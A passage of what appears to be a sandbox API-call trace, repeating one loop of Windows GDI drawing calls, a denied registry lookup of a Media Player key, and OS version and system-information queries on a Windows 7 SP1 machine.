returned 0xffffffff [0017.583] BeginPath (hdc=0x0) returned 0 [0017.583] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.583] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.583] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.583] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.583] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.583] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.583] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.584] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d04027d [0017.584] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x57040713 [0017.584] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040abd [0017.584] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040abe [0017.584] CombineRgn (hrgnDst=0x1040abd, hrgnSrc1=0x4d04027d, hrgnSrc2=0x57040713, iMode=1) returned 1 [0017.584] CombineRgn (hrgnDst=0x1040abe, hrgnSrc1=0x4d04027d, hrgnSrc2=0x57040713, iMode=4) returned 2 [0017.584] CreateSolidBrush (color=0xff) returned 0x2100abc [0017.584] CreateSolidBrush (color=0xff0000) returned 0x1100abf [0017.584] DeleteObject (ho=0x1100abf) returned 1 [0017.584] DeleteObject (ho=0x57040713) returned 1 [0017.584] DeleteObject (ho=0x4d04027d) returned 1 [0017.584] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.584] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.584] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.584] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.584] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.584] BeginPath (hdc=0x0) returned 0 [0017.584] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.584] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.584] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.584] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.584] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.584] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.584] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.584] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.584] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x58040713 [0017.585] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e04027d [0017.585] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac0 [0017.585] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac1 [0017.585] CombineRgn (hrgnDst=0x1040ac0, hrgnSrc1=0x58040713, hrgnSrc2=0x4e04027d, iMode=1) returned 1 [0017.585] CombineRgn (hrgnDst=0x1040ac1, hrgnSrc1=0x58040713, hrgnSrc2=0x4e04027d, iMode=4) returned 2 [0017.585] CreateSolidBrush (color=0xff) returned 0x2100abf [0017.585] CreateSolidBrush (color=0xff0000) returned 0x1100ac2 [0017.585] DeleteObject (ho=0x1100ac2) returned 1 [0017.585] DeleteObject (ho=0x4e04027d) returned 1 [0017.585] DeleteObject (ho=0x58040713) returned 1 [0017.585] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.585] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.585] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.585] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.585] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.585] BeginPath (hdc=0x0) returned 0 [0017.585] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.585] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.585] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.585] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.585] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.585] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.585] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.585] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.585] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f04027d [0017.585] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x59040713 [0017.585] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac3 [0017.585] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac4 [0017.585] CombineRgn (hrgnDst=0x1040ac3, hrgnSrc1=0x4f04027d, hrgnSrc2=0x59040713, iMode=1) returned 1 [0017.585] CombineRgn (hrgnDst=0x1040ac4, hrgnSrc1=0x4f04027d, hrgnSrc2=0x59040713, iMode=4) returned 2 [0017.585] CreateSolidBrush (color=0xff) returned 0x2100ac2 [0017.585] CreateSolidBrush (color=0xff0000) returned 0x1100ac5 [0017.586] DeleteObject (ho=0x1100ac5) returned 1 [0017.586] DeleteObject (ho=0x59040713) returned 1 [0017.586] DeleteObject (ho=0x4f04027d) returned 1 [0017.586] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.586] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.586] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.586] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.586] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.586] BeginPath (hdc=0x0) returned 0 [0017.586] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.586] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.586] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.586] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.586] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.586] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.586] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.586] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.586] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a040713 [0017.586] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5004027d [0017.586] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac6 [0017.586] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac7 [0017.586] CombineRgn (hrgnDst=0x1040ac6, hrgnSrc1=0x5a040713, hrgnSrc2=0x5004027d, iMode=1) returned 1 [0017.586] CombineRgn (hrgnDst=0x1040ac7, hrgnSrc1=0x5a040713, hrgnSrc2=0x5004027d, iMode=4) returned 2 [0017.586] CreateSolidBrush (color=0xff) returned 0x2100ac5 [0017.586] CreateSolidBrush (color=0xff0000) returned 0x1100ac8 [0017.586] DeleteObject (ho=0x1100ac8) returned 1 [0017.586] DeleteObject (ho=0x5004027d) returned 1 [0017.586] DeleteObject (ho=0x5a040713) returned 1 [0017.586] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.586] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.587] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.587] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.587] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.587] BeginPath (hdc=0x0) returned 0 [0017.587] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.587] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.587] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.587] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.587] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.587] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.587] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.587] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.587] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5104027d [0017.587] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b040713 [0017.587] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac9 [0017.587] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aca [0017.587] CombineRgn (hrgnDst=0x1040ac9, hrgnSrc1=0x5104027d, hrgnSrc2=0x5b040713, iMode=1) returned 1 [0017.587] CombineRgn (hrgnDst=0x1040aca, hrgnSrc1=0x5104027d, hrgnSrc2=0x5b040713, iMode=4) returned 2 [0017.587] CreateSolidBrush (color=0xff) returned 0x2100ac8 [0017.587] CreateSolidBrush (color=0xff0000) returned 0x1100acb [0017.587] DeleteObject (ho=0x1100acb) returned 1 [0017.587] DeleteObject (ho=0x5b040713) returned 1 [0017.587] DeleteObject (ho=0x5104027d) returned 1 [0017.587] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.587] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.587] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.587] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.587] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.587] BeginPath (hdc=0x0) returned 0 [0017.587] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.587] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.587] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.588] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.588] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.588] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.588] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.588] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.588] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c040713 [0017.588] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5204027d [0017.588] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040acc [0017.588] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040acd [0017.588] CombineRgn (hrgnDst=0x1040acc, hrgnSrc1=0x5c040713, hrgnSrc2=0x5204027d, iMode=1) returned 1 [0017.588] CombineRgn (hrgnDst=0x1040acd, hrgnSrc1=0x5c040713, hrgnSrc2=0x5204027d, iMode=4) returned 2 [0017.588] CreateSolidBrush (color=0xff) returned 0x2100acb [0017.588] CreateSolidBrush (color=0xff0000) returned 0x1100ace [0017.588] DeleteObject (ho=0x1100ace) returned 1 [0017.588] DeleteObject (ho=0x5204027d) returned 1 [0017.588] DeleteObject (ho=0x5c040713) returned 1 [0017.588] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.588] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.588] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.588] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.588] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.588] BeginPath (hdc=0x0) returned 0 [0017.588] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.588] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.588] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.588] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.588] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.588] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.588] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.589] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.589] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5304027d [0017.589] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d040713 [0017.589] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040acf [0017.589] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad0 [0017.589] CombineRgn (hrgnDst=0x1040acf, hrgnSrc1=0x5304027d, hrgnSrc2=0x5d040713, iMode=1) returned 1 [0017.589] CombineRgn (hrgnDst=0x1040ad0, hrgnSrc1=0x5304027d, hrgnSrc2=0x5d040713, iMode=4) returned 2 [0017.589] CreateSolidBrush (color=0xff) returned 0x2100ace [0017.589] CreateSolidBrush (color=0xff0000) returned 0x1100ad1 [0017.589] DeleteObject (ho=0x1100ad1) returned 1 [0017.589] DeleteObject (ho=0x5d040713) returned 1 [0017.589] DeleteObject (ho=0x5304027d) returned 1 [0017.589] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.589] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.589] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.589] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.589] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.589] BeginPath (hdc=0x0) returned 0 [0017.589] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.589] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.589] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.589] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.589] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.589] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.589] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.589] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.589] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e040713 [0017.590] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5404027d [0017.590] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad2 [0017.590] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad3 [0017.590] CombineRgn (hrgnDst=0x1040ad2, hrgnSrc1=0x5e040713, hrgnSrc2=0x5404027d, iMode=1) returned 1 [0017.590] CombineRgn (hrgnDst=0x1040ad3, hrgnSrc1=0x5e040713, hrgnSrc2=0x5404027d, iMode=4) returned 2 [0017.590] CreateSolidBrush (color=0xff) returned 0x2100ad1 [0017.590] CreateSolidBrush (color=0xff0000) returned 0x1100ad4 [0017.590] DeleteObject (ho=0x1100ad4) returned 1 [0017.590] DeleteObject (ho=0x5404027d) returned 1 [0017.590] DeleteObject (ho=0x5e040713) returned 1 [0017.590] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.590] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.590] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.590] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.590] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.590] BeginPath (hdc=0x0) returned 0 [0017.590] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.590] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.590] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.590] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.590] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.590] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.590] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.590] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.590] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5504027d [0017.590] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f040713 [0017.590] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad5 [0017.590] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad6 [0017.590] CombineRgn (hrgnDst=0x1040ad5, hrgnSrc1=0x5504027d, hrgnSrc2=0x5f040713, iMode=1) returned 1 [0017.590] CombineRgn (hrgnDst=0x1040ad6, hrgnSrc1=0x5504027d, hrgnSrc2=0x5f040713, iMode=4) returned 2 [0017.590] CreateSolidBrush (color=0xff) returned 0x2100ad4 [0017.591] CreateSolidBrush (color=0xff0000) returned 0x1100ad7 [0017.591] DeleteObject (ho=0x1100ad7) returned 1 [0017.591] DeleteObject (ho=0x5f040713) returned 1 [0017.591] DeleteObject (ho=0x5504027d) returned 1 [0017.591] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.591] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.591] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.591] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.591] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.591] BeginPath (hdc=0x0) returned 0 [0017.591] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.591] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.591] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.591] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.591] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.591] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.591] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.591] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60040713 